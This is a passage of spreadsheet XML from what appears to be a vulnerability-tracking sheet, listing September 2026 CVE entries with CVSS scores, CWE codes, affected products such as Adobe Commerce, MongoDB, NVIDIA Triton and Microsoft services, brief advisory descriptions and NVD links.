      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S710"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T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77110</t>
        </is>
      </c>
      <c r="D711" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E711" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F711" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S711"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T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82053</t>
        </is>
      </c>
      <c r="D712" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E712" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F712" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K712" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S712"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T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86073</t>
        </is>
      </c>
      <c r="D713" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E713" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S713"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713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0860</t>
        </is>
      </c>
      <c r="D714" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E714" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F714" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S714"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T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16025</t>
        </is>
      </c>
      <c r="D715" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E715" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16025</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16037</t>
        </is>
      </c>
      <c r="D716" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E716" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr">
        <is>
          <t>CWE-208</t>
        </is>
      </c>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>Observable timing discrepancy vulnerability in PayTR Payment and Electronic Money Institution Inc. PayTR Virtual Pos iFrame API (v9x) WHMCS Module allows Black Box Reverse Engineering.
This issue affects PayTR Virtual Pos iFrame API (v9x) WHMCS Module: from v9.0.0 before v9.0.3.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16037</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16497</t>
        </is>
      </c>
      <c r="D717" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E717" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F717" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr"/>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="S717" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could cause excessive iteration. A successful exploit of this vulnerability might lead to denial of service.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16497</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28604</t>
        </is>
      </c>
      <c r="D718" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E718" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F718" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr"/>
      <c r="K718" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3174</t>
        </is>
      </c>
      <c r="D719" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E719" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F719" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47625</t>
        </is>
      </c>
      <c r="D720" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E720" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F720" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>NVIDIA Triton Inference Server for Linux contains a vulnerability where an attacker could abuse missing authorization. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and denial of service.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47625</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48888</t>
        </is>
      </c>
      <c r="D721" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E721" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F721" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in Automattic WooCommerce allows HTTP DoS.
This issue affects WooCommerce: from n/a before 11.1.0.</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48888</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="D722" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E722" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F722" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr">
        <is>
          <t>microsoft:remote_desktop_client</t>
        </is>
      </c>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57099</t>
        </is>
      </c>
      <c r="D723" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E723" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F723" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr"/>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in ASP.NET Core allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57099</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="D724" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E724" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F724" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="D725" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F725" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr"/>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="D726" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F726" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="D727" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F727" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D728" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F728" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr">
        <is>
